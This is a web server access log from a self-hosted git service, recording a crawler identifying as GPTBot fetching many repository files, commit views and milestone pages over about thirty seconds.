"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:15:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:15:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 10412] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:15:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 10427] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:15:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:15:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:30:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Services.tsx" +[17/Feb/2026:15:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components/Services.tsx" +[17/Feb/2026:15:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 13885] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host" +[17/Feb/2026:15:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12758] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host" +[17/Feb/2026:15:30:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Footer.tsx" +[17/Feb/2026:15:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components/Footer.tsx" +[17/Feb/2026:15:30:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Header.tsx" +[17/Feb/2026:15:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components/Header.tsx" +[17/Feb/2026:15:30:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/$%7BgetInvestingUrl(symbol)%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?files=.TemporaryDocument" [Client 74.7.227.38] [Length 17132] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" +[17/Feb/2026:15:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" +[17/Feb/2026:15:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" +[17/Feb/2026:15:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 11555] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fPYZ-00.toc" [Client 74.7.227.38] [Length 30318] [Gzip 11.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:15:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fPKG-00.toc" [Client 74.7.227.38] [Length 21919] [Gzip 5.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:15:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 2430] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:15:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12488] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:15:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:15:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 15117] [Gzip 8.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:15:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2flocalpycs" [Client 74.7.227.38] [Length 24670] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:15:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fwarn-GoldMonitor.txt" [Client 74.7.227.38] [Length 25199] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:15:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fwarn-AssetPilot.txt" [Client 74.7.227.38] [Length 25164] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:15:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2flocalpycs" [Client 74.7.227.38] [Length 24634] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:15:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 10422] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:15:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:15:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fbase_library.zip" [Client 74.7.227.38] [Length 20842] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:15:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2flocalpycs" [Client 74.7.227.38] [Length 24686] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:15:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fPYZ-00.pyz" [Client 74.7.227.38] [Length 18042] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:15:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fEXE-00.toc" [Client 74.7.227.38] [Length 23347] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:15:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2flocalpycs" [Client 74.7.227.38] [Length 24629] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:15:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 11749] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:15:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13159] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" +[17/Feb/2026:15:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" +[17/Feb/2026:15:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12256] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:15:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12258] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:15:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log?display=rendered" [Client 74.7.227.38] [Length 10995] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" +[17/Feb/2026:15:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=mostcomplete&state=open" [Client 74.7.227.38] [Length 8509] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" +[17/Feb/2026:15:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=leastcomplete&state=open" [Client 74.7.227.38] [Length 8503] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" +[17/Feb/2026:15:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=closestduedate&state=open" [Client 74.7.227.38] [Length 8498] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" +[17/Feb/2026:15:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=closestduedate&state=open" [Client 74.7.227.38] [Length 8500] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" +[17/Feb/2026:15:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html%2fstatus.json" [Client 74.7.227.38] [Length 18207] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" +[17/Feb/2026:15:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:15:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 11013] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:15:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 962] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" 